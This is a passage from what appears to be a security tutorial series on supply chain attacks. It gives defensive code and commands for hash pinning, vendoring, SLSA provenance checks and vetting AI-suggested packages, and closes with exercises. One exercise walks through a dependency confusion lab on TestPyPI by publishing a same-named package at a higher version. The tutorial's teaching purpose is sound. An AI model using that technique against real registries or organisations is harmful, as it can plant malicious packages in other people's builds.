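        m = PIN.match(line.strip())
        if m:
            key = f"{m['name'].lower()}=={m['version']}"
            pins[key] = set(HASH.findall(line))
    return pins


def verify_artifact(data: bytes, allowed: set[str]) -> bool:
    """True only if the artifact's sha256 matches one of the pinned digests."""
    return hashlib.sha256(data).hexdigest() in allowed
```

A tampered wheel, even one with the same name and version, produces a different digest and is rejected. That is what defeats a registry-side swap, though not a SolarWinds-style poisoned build that is hashed after the fact.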
```bash
# 2. Vendor dependencies (copy into your repo)
# Go makes this easy:
go mod vendor
# All dependencies are now in ./vendor/ inside your repo
# Builds no longer need to reach external registries
# Build with: go build -mod=vendor ./...

# Python equivalent:
pip download -r requirements.txt -d ./vendor/
pip install --no-index --find-links=./vendor/ -r requirements.txt

# This removes the registry from every later build
# (the initial download still trusts it)
# Tradeoff: repo size increases, updates are manual
```
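```bash
# 3. SLSA framework (Supply-chain Levels for Software Artifacts)
# https://slsa.dev/
#
# Levels as defined in the original SLSA v0.1 spec
# (SLSA v1.0 reorganized them into Build L0-L3 and dropped Level 4):
# Level 1: Build process scripted, provenance generated
# Level 2: Hosted build service, generates authenticated provenance
#          (a signed statement of: who built it, from what source,
#          using what build system, producing what output)
# Level 3: Build platform hardened (isolated, ephemeral build
#          environments; provenance that can't be forged)
# Level 4: Two-person review for ALL changes, plus hermetic
#          (no network access during build) and, ideally,
#          reproducible (same source = same output) builds

# Verify SLSA provenance for a container image:
# (myorg is a placeholder; cosign 2.x requires an identity
#  flag alongside the issuer in keyless mode)
cosign verify-attestation \
    --type slsaprovenance \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-identity-regexp '^https://github.com/myorg/' \
    myregistry.com/myimage:v1.0

# npm package provenance (available since 2023):
npm audit signatures
# Verifies registry signatures and, where published, provenance
# attestations linking packages to the CI/CD build that produced them
```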
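Once a tool like cosign has verified the signature on a provenance statement, the remaining questions are "is this statement about my artifact?" and "was it built by the builder I trust?". A sketch of those two checks on an in-toto statement follows. It reads the builder ID from SLSA provenance v0.2 (`predicate.builder.id`) or v1 (`predicate.runDetails.builder.id`), does NOT verify signatures itself, and uses a hypothetical function name. For container images, the subject digest is the image manifest digest rather than a hash of raw file bytes:

```python
import hashlib


def check_provenance(statement: dict, artifact: bytes, expected_builder: str) -> list[str]:
    """Problems found when matching a signature-verified SLSA statement to an artifact."""
    problems = []
    digest = hashlib.sha256(artifact).hexdigest()
    subjects = {s.get("digest", {}).get("sha256") for s in statement.get("subject", [])}
    if digest not in subjects:
        problems.append("artifact digest not listed as a subject")
    predicate = statement.get("predicate", {})
    builder = (predicate.get("builder")                       # provenance v0.2
               or predicate.get("runDetails", {}).get("builder")  # provenance v1
               or {}).get("id")
    if builder != expected_builder:
        problems.append(f"unexpected builder: {builder!r}")
    return problems
```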
```bash
# 4. Private registry with upstream mirroring and approval
# Artifactory / Nexus / Verdaccio (npm) / DevPI (Python)
#
# Policy: new packages require security review before approval
# Only reviewed packages are available to build systems
# Mirrors approved versions from upstream registries
# Blocks direct access to public registries from CI/CD

# 5. Code signing and provenance
# Sigstore (cosign) for container images:
cosign sign --key cosign.key myregistry.com/myimage:v1.0
cosign verify --key cosign.pub myregistry.com/myimage:v1.0

# 6. Dependency review on pull requests
# GitHub: Dependency Review Action
# Blocks PRs that introduce known-vulnerable dependencies
# Shows diff of dependency changes in every PR
```
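The approval policy in point 4 is normally enforced by the private registry itself. The same idea also works as a simple CI gate, sketched below. The allowlist format (package name mapped to reviewed versions) and the function name are assumptions for illustration:

```python
def unapproved(requirements: list[str], approved: dict[str, set[str]]) -> list[str]:
    """Requirements (name==version) that are not on the reviewed allowlist."""
    rejected = []
    for req in requirements:
        name, sep, version = req.partition("==")
        if not sep:
            rejected.append(f"{req} (not pinned)")
        elif version.strip() not in approved.get(name.strip().lower(), set()):
            rejected.append(req)
    return rejected
```

A typosquatted name, an unreviewed version bump, and an unpinned requirement all fail the gate the same way, which keeps the review step from being skipped.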

The SLSA framework is particularly important because it addresses the SolarWinds-style attack directly. At its highest requirements the build process is hermetic (no network access during build, so a compromised build server can't download additional malicious code) and reproducible (building from the same source always produces bit-identical output, so a backdoor injected during build would produce a different hash than an independent rebuild from the same source). A SolarWinds build held to that standard would have been detectable: rebuild from source, compare hashes, notice they don't match, investigate.
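The "rebuild from source, compare hashes" step can be sketched as a directory comparison. This assumes two output directories: one from the official pipeline and one from an independent rebuild of the same commit. Function names are hypothetical. Any difference is a lead, not proof, because builds that are not fully reproducible (embedded timestamps, paths) also produce differences:

```python
import hashlib
from pathlib import Path


def digest_tree(root: Path) -> dict[str, str]:
    """sha256 of every file under `root`, keyed by its path relative to `root`."""
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_builds(official: Path, rebuild: Path) -> list[str]:
    """Paths whose content differs, or that exist in only one of the two builds."""
    a, b = digest_tree(official), digest_tree(rebuild)
    return sorted(path for path in a.keys() | b.keys() if a.get(path) != b.get(path))
```

In the SolarWinds case, the backdoored business-layer DLL would have been the file that showed up in this list.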

The AI Slop Connection

AI code generators have created an entirely new supply chain attack vector. When a developer asks an AI to help with a task and the AI suggests pip install obscure-package-name, how does the developer verify that package is legitimate? They probably don't. They paste the command, install the package, and move on.

Worse, AI models sometimes hallucinate package names -- they suggest packages that don't exist. Researchers have demonstrated that you can register the hallucinated package names on PyPI and npm, and real developers will install them because an AI told them to. This is dependency confusion by proxy, with the AI as the unwitting accomplice.
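A minimal sanity check before installing an AI-suggested package is to look at its registry metadata first. The sketch below works on the already-parsed response of PyPI's JSON API (`https://pypi.org/pypi/<name>/json`, which answers 404 for names that don't exist); fetching it is left out. The 90-day threshold, the flag wording, and the function names are arbitrary assumptions:

```python
from datetime import datetime
from typing import Optional


def first_upload(meta: dict) -> Optional[datetime]:
    """Earliest file upload time in a PyPI JSON API response."""
    times = [
        # e.g. "2023-05-22T15:12:44.175122Z"; older Pythons reject the trailing "Z"
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in meta.get("releases", {}).values()
        for f in files
    ]
    return min(times) if times else None


def red_flags(meta: Optional[dict], now: datetime, min_age_days: int = 90) -> list[str]:
    """Cheap pre-install checks for a package name an AI assistant suggested."""
    if meta is None:  # e.g. the JSON endpoint answered 404
        return ["package does not exist: hallucinated name, and anyone can register it"]
    flags = []
    first = first_upload(meta)
    if first is None:
        flags.append("no files have ever been uploaded")
    elif (now - first).days < min_age_days:
        flags.append(f"first upload only {(now - first).days} days ago")
    if len(meta.get("releases", {})) < 2:
        flags.append("fewer than two releases")
    return flags
```

Call it with `datetime.now(timezone.utc)` as `now`. Checks like these only raise the bar; they are exactly the kind of automated gate that a patient attacker can age past or pad out.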

And on the offensive side, AI is being used to generate malicious packages at scale. An attacker can use AI to create hundreds of typosquatted packages with legitimate-looking README files, documentation, changelogs, and even test suites. The packages look real because they were generated by the same models that generate real packages. Automated quality checks (does this package have a README? does it have tests? is the description coherent?) are defeated because AI generates all of those artifacts trivially.

The supply chain was already fragile before AI. AI is making it more fragile in two ways simultaneously: increasing the volume of dependencies (AI suggests adding packages for trivial functionality that a developer would have written in 10 lines of code) and increasing the sophistication of attacks (AI-generated malicious packages that pass casual inspection and automated quality gates).

What Comes Next

We've now completed a massive arc of the series. From episode 1 through episode 45, we've covered the full technical spectrum: reconnaissance and scanning, web application attacks, network exploitation, privilege escalation, lateral movement, cloud and infrastructure attacks, exploitation frameworks, custom binary exploitation with modern mitigation bypasses, reverse engineering, and now supply chain attacks. These are the how of hacking -- the techniques, the tools, the methods.

The next phase of this series shifts to a fundamentally different question. The techniques we've covered so far assume a technical attack surface -- a buffer overflow, a SQL injection, a misconfigured cloud instance. But the vast majority of successful breaches don't start with a technical exploit. They start with a human making a mistake. Clicking a link. Reusing a password. Plugging in a USB drive. Trusting a phone call. The human element is not just another attack surface -- it's the attack surface that every technical defense ultimately depends on. And understanding why decades of security awareness training have failed to fix it requires looking at security through an entirely different lens than the one we've been using.

Exercises

Exercise 1: Audit the dependencies of a project you work on. Use npm audit, pip-audit, or cargo audit depending on the language. Document: (a) total number of direct dependencies, (b) total number of transitive dependencies, (c) number of known vulnerabilities found, (d) severity breakdown (critical/high/medium/low). If any critical vulnerabilities exist, trace the dependency chain to understand how the vulnerable package entered your project. Save to ~/lab-notes/dependency-audit.md.

Exercise 2: Research the XZ Utils backdoor (CVE-2024-3094) in depth. Document: (a) the social engineering timeline -- how "Jia Tan" built trust over two years, (b) the technical mechanism -- how the backdoor was hidden in the build system and release tarballs rather than the git source, (c) how it was discovered -- Andres Freund's 500ms latency observation, (d) which Linux distributions were affected and which caught it in time, (e) what supply chain defenses (SLSA provenance, reproducible builds, tarball-vs-git comparison) would have detected it earlier. Save to ~/lab-notes/xz-backdoor-analysis.md.

Exercise 3: Set up a dependency confusion lab. Create a private Python package with a unique name (e.g., mycompany-testpkg-RANDOMSTRING). Configure pip with a local directory as the primary index and TestPyPI (https://test.pypi.org/) as the extra index. Observe: does pip prefer the local version or the public version when the public version has a higher version number? Register the same package name on TestPyPI with version 99.0.0 and test again. Document pip's resolution behavior and how to configure pip to prevent this confusion. Use TestPyPI only -- do NOT publish to real PyPI. Save to ~/lab-notes/dependency-confusion-lab.md.


Thanks, and until next time!

@scipio


